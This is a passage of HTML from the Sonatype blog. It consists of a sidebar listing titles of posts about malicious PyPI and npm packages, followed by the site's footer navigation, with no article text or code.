            <div class="tabber-wrap">
              <ul class="clearfix tabber-tabs">
            
                <li class="active"><a>AUTHOR POSTS</a></li>
               <li><a>TOPIC POSTS</a></li> 
            
              </ul>
              <div class="tabber-content">
                <div class="tab-pane active">
                  
                    <ul class="sidebar-list">
                        
                            <li>
                              <div class="row-fluid" style="margin-top:10px;">
                                  <div class="span4">
                                      <img src="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-open-source-components-dependencies-100.jpg" class="tabber-post-image https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero findme">
                                  </div>
                                  <div class="span8" style="line-height:1;">
                                      <a href="https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero" class="tabber-post-heading">PyPI Package 'secretslib' Drops Fileless Linux Malware to Mine Monero  </a>
                                      <p><i class="fa fa-pencil"></i>Ax Sharma</p> 
                                   
                                </div>                                 
                              </div>
                          </li>
                        
                            <li>
                              <div class="row-fluid" style="margin-top:10px;">
                                  <div class="span4">
                                      <img src="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-security-bad-component-vulnerability-scanning-100.jpg" class="tabber-post-image https://blog.sonatype.com/ransomware-in-a-pypi-sonatype-spots-requests-typosquat findme">
                                  </div>
                                  <div class="span8" style="line-height:1;">
                                      <a href="https://blog.sonatype.com/ransomware-in-a-pypi-sonatype-spots-requests-typosquat" class="tabber-post-heading">Ransomware in PyPI: Sonatype Spots 'Requests' Typosquats  </a>
                                      <p><i class="fa fa-pencil"></i>Ax Sharma</p> 
                                   
                                </div>                                 
                              </div>
                          </li>
                        
                            <li>
                              <div class="row-fluid" style="margin-top:10px;">
                                  <div class="span4">
                                      <img src="https://blog.sonatype.com/hubfs/Blog%20Images%202022/Blog%20featured%20images/Blog-feature-DevSecOps@2x.png" class="tabber-post-image https://blog.sonatype.com/stringjs-typosquat-caught-with-discord-info-stealer findme">
                                  </div>
                                  <div class="span8" style="line-height:1;">
                                      <a href="https://blog.sonatype.com/stringjs-typosquat-caught-with-discord-info-stealer" class="tabber-post-heading">StringJS Typosquat Deploys Discord Infostealer Obfuscated Five Times  </a>
                                      <p><i class="fa fa-pencil"></i>Ax Sharma</p> 
                                   
                                </div>                                 
                              </div>
                          </li>
                        
                    </ul>                  
                </div>
                <div class="tab-pane" id="tab-2">
                  
                  

                  
                  
                  
                  
                  
                  
                  
                      <ul class="sidebar-list">
                          
                              <li>
                                 <div class="row-fluid" style="margin-top:10px;">
                                   <div class="span4">
                                      <img src="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-ThisweekinMalware-1-100.jpg" class="tabber-post-image">                                     
                                   </div>
                                   <div class="span8" style="line-height:1;">
                                      <a class="tabber-post-heading" href="https://blog.sonatype.com/this-week-in-malware-fileless-linux-cryptominer-100-packages">This Week in Malware - Fileless Linux Cryptominer, 100 Packages</a>  
                                     
                                    <p><i class="fa fa-tag"></i>vulnerabilities</p>
                                   </div>
                                </div>
                            </li>
                          
                              <li>
                                 <div class="row-fluid" style="margin-top:10px;">
                                   <div class="span4">
                                      <img src="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-open-source-components-dependencies-100.jpg" class="tabber-post-image">                                     
                                   </div>
                                   <div class="span8" style="line-height:1;">
                                      <a class="tabber-post-heading" href="https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero">PyPI Package 'secretslib' Drops Fileless Linux Malware to Mine Monero</a>  
                                     
                                    <p><i class="fa fa-tag"></i>vulnerabilities</p>
                                   </div>
                                </div>
                            </li>
                          
                              <li>
                                 <div class="row-fluid" style="margin-top:10px;">
                                   <div class="span4">
                                      <img src="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-vulnerability-2-100.jpg" class="tabber-post-image">                                     
                                   </div>
                                   <div class="span8" style="line-height:1;">
                                      <a class="tabber-post-heading" href="https://blog.sonatype.com/this-week-in-malware-typosquats-in-pypi-dependency-confusion-packages">This Week in Malware—Typosquats in PyPI, dependency confusion packages</a>  
                                     
                                    <p><i class="fa fa-tag"></i>vulnerabilities</p>
                                   </div>
                                </div>
                            </li>
                          
                      </ul>                 
                </div>
              </div>              
            </div>
        </div>
    </div>
</div>
</div>

</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-4 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-blog_comments blog-2018-comments" style="" data-widget-type="blog_comments" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_blog_comments" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_blog_comments" style="" data-hs-cos-general-type="widget" data-hs-cos-type="blog_comments">
<div class="section post-footer">
    <div id="comments-listing" class="new-comments"></div>
    
      <div id="hs_form_target_57d70dc2-fdae-4a95-864a-471335c8677b"></div>
      
      
      
    
</div>

</span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end body -->
</div><!--end body wrapper -->

<div class="footer-container-wrapper">
    <div class="footer-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-global_group " style="" data-widget-type="global_group" data-x="0" data-w="12">
<div class="" data-global-widget-path="generated_global_groups/4063610545.html"><div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell sonatype-footer sonatype-body sonatype-section" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell desktop-footer" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-3 ">
<div class="row-fluid ">
<div class="span2 widget-span widget-type-cell sonatype-column" style="" data-widget-type="cell" data-x="0" data-w="2">

<div class="row-fluid-wrapper row-depth-1 row-number-4 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-linked_image sonatype-footer-nav-logo" style="" data-widget-type="linked_image" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_14568829902672" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_linked_image" style="" data-hs-cos-general-type="widget" data-hs-cos-type="linked_image"><a href="https://www.sonatype.com/" id="hs-link-module_14568829902672" style="border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=130&amp;name=SON_logo_white@2x%20copy%20trimmed.png" class="hs-image-widget " style="width:130px;border-width:0px;border:0px;" width="130" alt="SON_logo_white@2x copy trimmed" title="SON_logo_white@2x copy trimmed" srcset="https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=65&amp;name=SON_logo_white@2x%20copy%20trimmed.png 65w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=130&amp;name=SON_logo_white@2x%20copy%20trimmed.png 130w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=195&amp;name=SON_logo_white@2x%20copy%20trimmed.png 195w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=260&amp;name=SON_logo_white@2x%20copy%20trimmed.png 260w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=325&amp;name=SON_logo_white@2x%20copy%20trimmed.png 325w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=390&amp;name=SON_logo_white@2x%20copy%20trimmed.png 390w" sizes="(max-width: 130px) 100vw, 130px"></a></span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-5 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_html footer-menu" style="" data-widget-type="raw_html" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_14568829902673" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_raw_html" style="" data-hs-cos-general-type="widget" data-hs-cos-type="raw_html"><div class="sonatype-social">
<a href="https://twitter.com/sonatype" target="_blank"><i class="fa fa-twitter"></i> Twitter</a>
<a href="https://www.linkedin.com/company/sonatype" target="_blank"><i class="fa fa-linkedin"></i> LinkedIn</a>
<a href="https://www.facebook.com/Sonatype" target="_blank"><i class="fa fa-facebook"></i> Facebook</a>
<a href="https://www.youtube.com/user/sonatype" target="_blank"><i class="fa fa-youtube-play"></i> YouTube</a>
<a href="https://github.com/sonatype" target="_blank"><i class="fa fa-github"></i> GitHub</a>
</div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
<div class="span2 widget-span widget-type-cell sonatype-column footer-products" style="" data-widget-type="cell" data-x="2" data-w="2">

<div class="row-fluid-wrapper row-depth-1 row-number-6 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-rich_text " style="" data-widget-type="rich_text" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_14568829902678" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><h5 style="color: #ffffff; margin: 0; font-size: 18px;">Products</h5></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-7 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-simple_menu footer-menu" style="" data-widget-type="simple_menu" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_14568829902679" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_14568829902679" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-vertical" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/software-supply-chain-management" role="menuitem" target="_self">Full-Spectrum Platform</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/sonatype-lift" role="menuitem" target="_self">Sonatype Lift</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/open-source-security-dependency-management" role="menuitem" target="_self">Nexus Lifecycle</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/advanced-legal-pack" role="menuitem" target="_self"><span style="font-size:13px;">Advanced Legal Pack</span></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/lifecycle-foundation" role="menuitem" target="_self">Nexus Lifecycle Foundation</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/firewall" role="menuitem" target="_self">Nexus Firewall</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/container" role="menuitem" target="_self">Nexus Container</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/auditor" role="menuitem" target="_self">Nexus Auditor</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/nexus-repository" role="menuitem" target="_self">Nexus Repository</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/pricing" role="menuitem" target="_self">Pricing</a></li>
 </ul>
</div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
<div class="span2 widget-span widget-type-cell sonatype-column" style="" data-widget-type="cell" data-x="4" data-w="2">

<div class="row-fluid-wrapper row-depth-1 row-number-8 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-rich_text " style="" data-widget-type="rich_text" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1503090809028170" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><h5 style="color: #ffffff; margin: 0; font-size: 18px;">Free Tools</h5></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-9 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget footer-menu" style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1556825048647548" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module widget-type-simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><span id="hs_cos_wrapper_module_1556825048647548_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1556825048647548_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-vertical" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/vulnerability-scanner" role="menuitem" target="_self">Nexus Vulnerability Scanner</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://ossindex.sonatype.org/" role="menuitem" target="_blank" rel="noopener">OSS Index</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/free-developer-tools" role="menuitem" target="_self">Free Developer Tools</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/integrations" role="menuitem" target="_self">Nexus Integrations</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/nexus-intelligence-insights" role="menuitem" target="_self">CVE Insights</a></li>
 </ul>
</div></span></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
<div class="span2 widget-span widget-type-cell sonatype-column" style="" data-widget-type="cell" data-x="6" data-w="2">

<div class="row-fluid-wrapper row-depth-1 row-number-10 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-rich_text " style="" data-widget-type="rich_text" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_145688299026711" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><h5 style="color: #ffffff; margin: 0; font-size: 18px;">Solutions</h5></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-11 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-simple_menu footer-menu" style="" data-widget-type="simple_menu" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_145688299026712" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_145688299026712" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-vertical" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/software-developers" role="menuitem" target="_self">Developers</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/appsec-professionals" role="menuitem" target="_self">AppSec</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/devsecops-leaders" role="menuitem" target="_self">DevSecOps</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/legal-and-compliance-officers" role="menuitem" target="_self">Legal &amp; Compliance</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/government" role="menuitem" target="_self">Government</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/banking-and-financial-services" role="menuitem" target="_self">Financial Services</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/manufacturing" role="menuitem" target="_self">Manufacturing</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/technology-and-software" role="menuitem" target="_self">Technology</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/healthcare" role="menuitem" target="_self">Healthcare</a></li>
 </ul>
</div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
<div class="span2 widget-span widget-type-cell sonatype-column" style="" data-widget-type="cell" data-x="8" data-w="2">

<div class="row-fluid-wrapper row-depth-1 row-number-12 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-rich_text " style="" data-widget-type="rich_text" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_145688299026714" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><h5 style="color: #ffffff; margin: 0; font-size: 18px;">Resources</h5></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-13 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-simple_menu footer-menu" style="" data-widget-type="simple_menu" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_145688299026715" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_145688299026715" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-vertical" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu" class="active-branch">
  <li class="hs-menu-item hs-menu-depth-1 active active-branch" role="none"><a href="https://blog.sonatype.com" role="menuitem" target="_self">Sonatype Blog</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/whitepapers-reports-and-books" role="menuitem" target="_self">Whitepapers &amp; eBooks</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/webinars" role="menuitem" target="_self">Webinars</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://video.sonatype.com/" role="menuitem" target="_blank" rel="noopener">Videos</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/customer-success" role="menuitem" target="_self">Customer Stories</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/upcoming-events" role="menuitem" target="_self">Events</a></li>
 </ul>
</div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-14 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1623878945520150" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module widget-type-rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><span id="hs_cos_wrapper_module_1623878945520150_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><h5 style="font-size: 18px; margin-top: 25px; margin-bottom: 5px; color: #ffffff;">Customer Portal</h5></span></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-15 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget footer-menu" style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1623878960048152" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module widget-type-simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><span id="hs_cos_wrapper_module_1623878960048152_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1623878960048152_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-vertical" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/training" role="menuitem" target="_self">Training &amp; Workshops</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://my.sonatype.com/" role="menuitem" target="_blank" rel="noopener">My Sonatype&nbsp;&nbsp;<i class="fa fa-external-link"></i></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://guides.sonatype.com" role="menuitem" target="_blank" rel="noopener">Guides&nbsp;&nbsp;<i class="fa fa-external-link"></i></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://help.sonatype.com" role="menuitem" target="_blank" rel="noopener">Documentation&nbsp;&nbsp;<i class="fa fa-external-link"></i></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://learn.sonatype.com" role="menuitem" target="_blank" rel="noopener">Online Courses&nbsp;&nbsp;<i class="fa fa-external-link"></i></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://guides.sonatype.com" role="menuitem" target="_blank" rel="noopener">Customer Support&nbsp;&nbsp;<i class="fa fa-external-link"></i></a></li>
 </ul>
</div></span></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
<div class="span2 widget-span widget-type-cell sonatype-column" style="" data-widget-type="cell" data-x="10" data-w="2">

<div class="row-fluid-wrapper row-depth-1 row-number-16 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-rich_text " style="" data-widget-type="rich_text" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_145688299026717" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><h5 style="color: #ffffff; margin: 0; font-size: 18px;">Company</h5></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-17 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-simple_menu footer-menu" style="" data-widget-type="simple_menu" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_145688299026718" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_145688299026718" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-vertical" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/" role="menuitem" target="_self">About Sonatype</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/analyst-recognition-and-insights" role="menuitem" target="_self">Analyst Recognition</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/intelligence" role="menuitem" target="_self">Nexus Intelligence</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/partners" role="menuitem" target="_self">Partners</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/investors" role="menuitem" target="_self">Investors</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/press-releases" role="menuitem" target="_self">Press Releases</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/media" role="menuitem" target="_self">Media Coverage</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/press-kit" role="menuitem" target="_self">Press Kit</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/trust-center" role="menuitem" target="_self">Trust Center</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/careers" role="menuitem" target="_self">Careers</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/contactus" role="menuitem" target="_self">Contact Us</a></li>
 </ul>
</div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-18 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell mobile-footer" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-19 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-rich_text " style="" data-widget-type="rich_text" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1503090571206149" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><img src="https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=145&amp;name=SON_logo_white@2x%20copy%20trimmed.png" alt="SON_logo_white@2x copy trimmed" width="145" style="width: 145px;" srcset="https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=73&amp;name=SON_logo_white@2x%20copy%20trimmed.png 73w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=145&amp;name=SON_logo_white@2x%20copy%20trimmed.png 145w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=218&amp;name=SON_logo_white@2x%20copy%20trimmed.png 218w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=290&amp;name=SON_logo_white@2x%20copy%20trimmed.png 290w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=363&amp;name=SON_logo_white@2x%20copy%20trimmed.png 363w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_white@2x%20copy%20trimmed.png?width=435&amp;name=SON_logo_white@2x%20copy%20trimmed.png 435w" sizes="(max-width: 145px) 100vw, 145px"></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-20 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_html " style="" data-widget-type="raw_html" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1503090682618167" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_raw_html" style="" data-hs-cos-general-type="widget" data-hs-cos-type="raw_html"><div class="row-fluid">
<div style="width:50%; float:left;">
<ul class="mobile-footer-links">
<li><a href="https://www.sonatype.com/products-overview">Products</a> </li>
<li><a href="https://www.sonatype.com/nexus/free-developer-tools">Free Tools</a> </li>
<li><a href="https://www.sonatype.com/solutions/software-developers">Solutions</a> </li>
<li><a href="https://www.sonatype.com/resources/whitepapers-reports-and-books">Resources</a> </li>
<li><a href="https://www.sonatype.com/company">About</a> </li>
  <li><a href="https://www.sonatype.com/products/pricing">Pricing</a> </li>
</ul>
</div>
<div style="width:50%; float:left;">
<ul class="sonatype-social">
<li><a href="https://twitter.com/sonatype" target="_blank"><i class="fa fa-twitter"></i> Twitter</a></li>
<li><a href="https://www.linkedin.com/company/sonatype" target="_blank"><i class="fa fa-linkedin"></i> LinkedIn</a></li>
<li><a href="https://www.facebook.com/Sonatype" target="_blank"><i class="fa fa-facebook"></i> Facebook</a></li>
<li><a href="https://www.youtube.com/user/sonatype" target="_blank"><i class="fa fa-youtube-play"></i> YouTube</a></li>
<li><a href="https://github.com/sonatype" target="_blank"><i class="fa fa-github"></i>GitHub</a></li>
</ul>       
</div>
</div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
